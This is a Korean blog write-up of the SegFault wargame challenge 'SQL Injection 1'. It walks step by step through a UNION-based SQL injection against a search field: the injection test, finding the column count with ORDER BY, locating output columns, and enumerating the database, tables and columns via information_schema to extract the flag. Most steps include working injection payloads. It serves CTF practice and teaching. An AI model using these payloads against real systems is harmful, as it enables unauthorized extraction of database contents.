[SegFault] (SQLi)

Wargame & CTF/SegFault

[SegFault] (SQLi) - SQL Injection 1

Gearvirus(junyup2) 2023. 12. 6. 04:03

SQL Injection 1.

비밀 데이터를 찾아내라!

문제 파악

위의 페이지에 들어가면 아래와 같은 창이 나온다.

우선 검색창에 대하여 입력 테스트를 진행해본다.

SQL 구조 확인

우선 r 을 입력해본 결과 r 이라는 문자가 들어가는 3개의 ID가 검색의 대상이 되는 것을 보고 부분만 입력해도 나온다는 것을 확인할 수 있다.

그렇다면 검색창의 구조는 다음과 같을 것이라고 예상이 가능하다.

select * from ~~ where name like '%_____%';

그럼 우선 SQL Injection이 가능한지 확인해 보기 위해 and를 이용하여 참인 결과를 함께 넣어 확인해본다.

SQLi 가능여부 확인

select * from ~~ where name like '%(r%' and '1%'='1)%';

r 을 입력했을 경우와 r%' and '1%'='1 를 입력한 경우의 결과가 같은 것을 보고 SQL Injection이 가능하다고 판단할 수 있다.

그렇다면 이제부터는 UNION SQL Injection의 절차에 따라 진행해 주면 된다.

풀이 과정 (해결 방안)

1. SQL Injection 가능 여부 판단

위에서 확인했기 때문에 넘어 간다.

2. column 개수 파악하기

order by를 이용하여 1부터 대입 해본다.

r%'order by 1~4 까지는 각각 정렬의 방식이 바뀌면서 데이터가 출력되었지만 5부터는 안되는 것을 확인할 수 있었다.

따라서 column의 개수는 4개라는 것을 알 수 있다.

3. 출력되는 Column의 위치 찾기

어떤 Column이 어느 부분에 출력되는지 확인해야 한다.

r%' UNION SELECT 1,2,3,4 #

위의 결과를 바탕으로 출력이 되는 컬럼의 위치를 확인할 수 있다.

(출력이 되는 위치를 알아야 내용에 대한 확인이 가능하기 때문이다.)

ID | Level | Rank Point | Rage
1 | 2 | 3 | 4

공격 쿼리 설정

본 문제의 경우 1~4의 컬럼이 다 나오므로 아무 위치에나 원하는 SQL을 삽입하면 된다.

r%' UNION SELECT 1,____,3,4 #

4. DB 이름 확인하기

어떤 TABLE과 COLUMN이 있는지 알아내기 위해 어떤 DB에 존재하는지 부터 확인해야 한다.

SELECT database()

이를 공격 쿼리에 담아 확인해본 결과는 다음과 같다.

r%' UNION SELECT 1,database(),3,4 #

database() : sqli_1

5. Table 이름 확인하기

어떤 DB에 들어있는지 확인했으니 어떤 COLUMN이 있는지 확인하기 위해 어떤 TABLE이 있는지 확인해야 한다.

그 전에 몇개의 TABLE을 가지고 있는지 확인하는 것을 우선시 한다.

count(TABLE_NAME)

2번째 column위치에 넣어 주었기 때문에 Table의 개수는 3인 것을 확인할 수 있다.

그 다음 Table이름을 확인해준다. (이 문제의 경우 모든 내용이 출력되어서 사실상 위의 Table 개수 확인이 필요없는 경우에 해당하지만, 줄 수에 제한이 있는 경우도 다수 있어 가능하면 우선적으로 개수를 확인하고 가는 버릇을 들여야한다.)

table_name FROM information_schema.tables where table_schema = 'sqli_1' #

TABLE 이름을 확인한 결과는 다음과 같다.

r% 'UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema = 'sqli_1' #

flag_table
plusFlag_Table
user_info

6. Column 이름 확인하기

위에서 어떤 DB, TABLE이 존재하는지 확인하였기 때문에 이제 어떤 COLUMN이 존재하는지 확인할 차례이다.

column_name FROM information_schema.columns WHERE table_name = 'flag_table' #

COLUMN 이름을 확인한 결과는 다음과 같다.

r% 'union select 1,column_name,3,4 from information_schema.columns where table_name = 'flag_table' #

flag

7. 데이터 출력

flag column 안에 어떤 데이터가 있는지 확인해본다.

flag FROM flag_table #

r% ' UNION SELECT 1,flag,3,4 FROM flag_table #

flag COLUMN 내부에서 flag 데이터를 확인할 수 있었다.

질문 환영, 수정 및 보완에 대한 지적 환영

저작자표시